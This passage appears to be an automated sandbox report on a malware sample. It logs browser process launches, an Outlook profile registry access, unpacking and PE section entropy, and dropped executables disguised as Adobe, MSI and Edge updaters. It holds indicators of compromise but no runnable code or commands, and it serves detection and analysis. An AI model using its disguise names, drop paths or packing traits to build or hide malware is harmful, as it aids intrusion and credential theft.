                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=2488,i,12328680280612180646,18333747278986842312,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dec1c63-b17a-4876-842e-08a38d7ca489} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 15443b69710 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3352 -childID 1 -isForBrowser -prefsHandle 3476 -prefMapHandle 3456 -prefsLen 21837 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03d6e9a6-1e50-44a7-bf2d-b228302d3bed} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154542c5bd0 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 22027 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15219fb-e510-488d-91c4-9069f57fa56f} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 1544ff41d90 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 3 -isForBrowser -prefsHandle 2584 -prefMapHandle 4128 -prefsLen 22068 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25243739-fa95-4db8-bf39-e38de4f4d55a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154576c6a10 tab
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32
                          Source: EdgeMS131.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS131\EdgeMS131.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: I2jCDr35mu.exeStatic file information: File size 2328576 > 1048576
                          Source: I2jCDr35mu.exeStatic PE information: Raw size of awogigmw is bigger than: 0x100000 < 0x1a4400

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeUnpacked PE file: 0.2.I2jCDr35mu.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 6.2.MPGPH131.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 7.2.MPGPH131.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 8.2.RageMP131.exe.350000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 15.2.RageMP131.exe.350000.0.unpack :EW;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;awogigmw:EW;nkfwixkm:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeUnpacked PE file: 47.2.idPXKSo93Tb9SEEu9e8w.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW;
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeUnpacked PE file: 48.2.MSIUpdaterV131.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW;
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeUnpacked PE file: 51.2.MSIUpdaterV131.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tfywulqz:EW;prpgnkkw:EW;.taggant:EW;
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: ladas[1].exe.7.drStatic PE information: real checksum: 0x24b17d should be: 0x24abb4
                          Source: amert[1].exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: plaza[1].exe.7.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: real checksum: 0x24b17d should be: 0x24abb4
                          Source: RageMP131.exe.0.drStatic PE information: real checksum: 0x2398a3 should be: 0x242b44
                          Source: explorgu.exe.47.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: real checksum: 0x24b17d should be: 0xbaabc
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: plaza[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2df411
                          Source: EdgeMS131.exe.0.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: amert[1].exe.7.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: I2jCDr35mu.exeStatic PE information: real checksum: 0x2398a3 should be: 0x242b44
                          Source: MPGPH131.exe.0.drStatic PE information: real checksum: 0x2398a3 should be: 0x242b44
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: real checksum: 0x1ce836 should be: 0x1d505c
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: real checksum: 0x24b17d should be: 0x24abb4
                          Source: ladas[1].exe.0.drStatic PE information: real checksum: 0x24b17d should be: 0xbaabc
                          Source: I2jCDr35mu.exeStatic PE information: section name:
                          Source: I2jCDr35mu.exeStatic PE information: section name: .idata
                          Source: I2jCDr35mu.exeStatic PE information: section name:
                          Source: I2jCDr35mu.exeStatic PE information: section name: awogigmw
                          Source: I2jCDr35mu.exeStatic PE information: section name: nkfwixkm
                          Source: I2jCDr35mu.exeStatic PE information: section name: .taggant
                          Source: RageMP131.exe.0.drStatic PE information: section name:
                          Source: RageMP131.exe.0.drStatic PE information: section name: .idata
                          Source: RageMP131.exe.0.drStatic PE information: section name:
                          Source: RageMP131.exe.0.drStatic PE information: section name: awogigmw
                          Source: RageMP131.exe.0.drStatic PE information: section name: nkfwixkm
                          Source: RageMP131.exe.0.drStatic PE information: section name: .taggant
                          Source: MPGPH131.exe.0.drStatic PE information: section name:
                          Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
                          Source: MPGPH131.exe.0.drStatic PE information: section name:
                          Source: MPGPH131.exe.0.drStatic PE information: section name: awogigmw
                          Source: MPGPH131.exe.0.drStatic PE information: section name: nkfwixkm
                          Source: MPGPH131.exe.0.drStatic PE information: section name: .taggant
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: plaza[1].exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name: .idata
                          Source: ladas[1].exe.0.drStatic PE information: section name:
                          Source: ladas[1].exe.0.drStatic PE information: section name: gakjennq
                          Source: ladas[1].exe.0.drStatic PE information: section name: brsozmps
                          Source: ladas[1].exe.0.drStatic PE information: section name: .taggant
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name:
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: .idata
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name:
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: gakjennq
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: brsozmps
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: .taggant
                          Source: amert[1].exe.0.drStatic PE information: section name:
                          Source: amert[1].exe.0.drStatic PE information: section name: .idata
                          Source: amert[1].exe.0.drStatic PE information: section name:
                          Source: amert[1].exe.0.drStatic PE information: section name: tfywulqz
                          Source: amert[1].exe.0.drStatic PE information: section name: prpgnkkw
                          Source: amert[1].exe.0.drStatic PE information: section name: .taggant
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name:
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: .idata
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name:
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: tfywulqz
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: prpgnkkw
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: .taggant
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: .idata
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: tfywulqz
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: prpgnkkw
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: .taggant
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: .idata
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name:
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: tfywulqz
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: prpgnkkw
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: .taggant
                          Source: EdgeMS131.exe.0.drStatic PE information: section name:
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: .idata
                          Source: EdgeMS131.exe.0.drStatic PE information: section name:
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: tfywulqz
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: prpgnkkw
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: .taggant
                          Source: niks[1].exe.0.drStatic PE information: section name:
                          Source: niks[1].exe.0.drStatic PE information: section name: .idata
                          Source: niks[1].exe.0.drStatic PE information: section name:
                          Source: niks[1].exe.0.drStatic PE information: section name: odmizeae
                          Source: niks[1].exe.0.drStatic PE information: section name: wjrksujl
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name:
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: .idata
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name:
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: odmizeae
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: wjrksujl
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name:
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: .idata
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name:
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: odmizeae
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: wjrksujl
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: .idata
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name:
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: gakjennq
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: brsozmps
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: .taggant
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name:
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: .idata
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name:
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: tfywulqz
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: prpgnkkw
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: .taggant
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name: .idata
                          Source: ladas[1].exe.7.drStatic PE information: section name:
                          Source: ladas[1].exe.7.drStatic PE information: section name: gakjennq
                          Source: ladas[1].exe.7.drStatic PE information: section name: brsozmps
                          Source: ladas[1].exe.7.drStatic PE information: section name: .taggant
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name:
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: .idata
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name:
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: gakjennq
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: brsozmps
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: .taggant
                          Source: amert[1].exe.7.drStatic PE information: section name:
                          Source: amert[1].exe.7.drStatic PE information: section name: .idata
                          Source: amert[1].exe.7.drStatic PE information: section name:
                          Source: amert[1].exe.7.drStatic PE information: section name: tfywulqz
                          Source: amert[1].exe.7.drStatic PE information: section name: prpgnkkw
                          Source: amert[1].exe.7.drStatic PE information: section name: .taggant
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name:
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: .idata
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name:
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: tfywulqz
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: prpgnkkw
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: .taggant
                          Source: niks[1].exe.7.drStatic PE information: section name:
                          Source: niks[1].exe.7.drStatic PE information: section name: .idata
                          Source: niks[1].exe.7.drStatic PE information: section name:
                          Source: niks[1].exe.7.drStatic PE information: section name: odmizeae
                          Source: niks[1].exe.7.drStatic PE information: section name: wjrksujl
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name:
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: .idata
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name:
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: odmizeae
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: wjrksujl
                          Source: gmpopenh264.dll.tmp.36.drStatic PE information: section name: .rodata
                          Source: explorgu.exe.47.drStatic PE information: section name:
                          Source: explorgu.exe.47.drStatic PE information: section name: .idata
                          Source: explorgu.exe.47.drStatic PE information: section name:
                          Source: explorgu.exe.47.drStatic PE information: section name: tfywulqz
                          Source: explorgu.exe.47.drStatic PE information: section name: prpgnkkw
                          Source: explorgu.exe.47.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0010D638 push ecx; ret 0_2_0010D64B
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00ACD638 push ecx; ret 6_2_00ACD64B
                          Source: I2jCDr35mu.exeStatic PE information: section name: entropy: 7.98730344696013
                          Source: I2jCDr35mu.exeStatic PE information: section name: awogigmw entropy: 7.953507397861078
                          Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.98730344696013
                          Source: RageMP131.exe.0.drStatic PE information: section name: awogigmw entropy: 7.953507397861078
                          Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.98730344696013
                          Source: MPGPH131.exe.0.drStatic PE information: section name: awogigmw entropy: 7.953507397861078
                          Source: plaza[1].exe.0.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: plaza[1].exe.0.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: plaza[1].exe.0.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: plaza[1].exe.0.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: zs1nXDHCjbiIGotgg4qJ.exe.0.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: ladas[1].exe.0.drStatic PE information: section name: entropy: 7.9816083368851425
                          Source: ladas[1].exe.0.drStatic PE information: section name: gakjennq entropy: 7.937614618758915
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: entropy: 7.9816083368851425
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: section name: gakjennq entropy: 7.952472916491743
                          Source: amert[1].exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: amert[1].exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: idPXKSo93Tb9SEEu9e8w.exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: AdobeUpdaterV131.exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: MSIUpdaterV131.exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: EdgeMS131.exe.0.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: niks[1].exe.0.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: niks[1].exe.0.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: RhvHlFoQ86AMGIsTANJB.exe.0.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: ZLGJz1zjooaGjpiGIhT0.exe.6.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: entropy: 7.9816083368851425
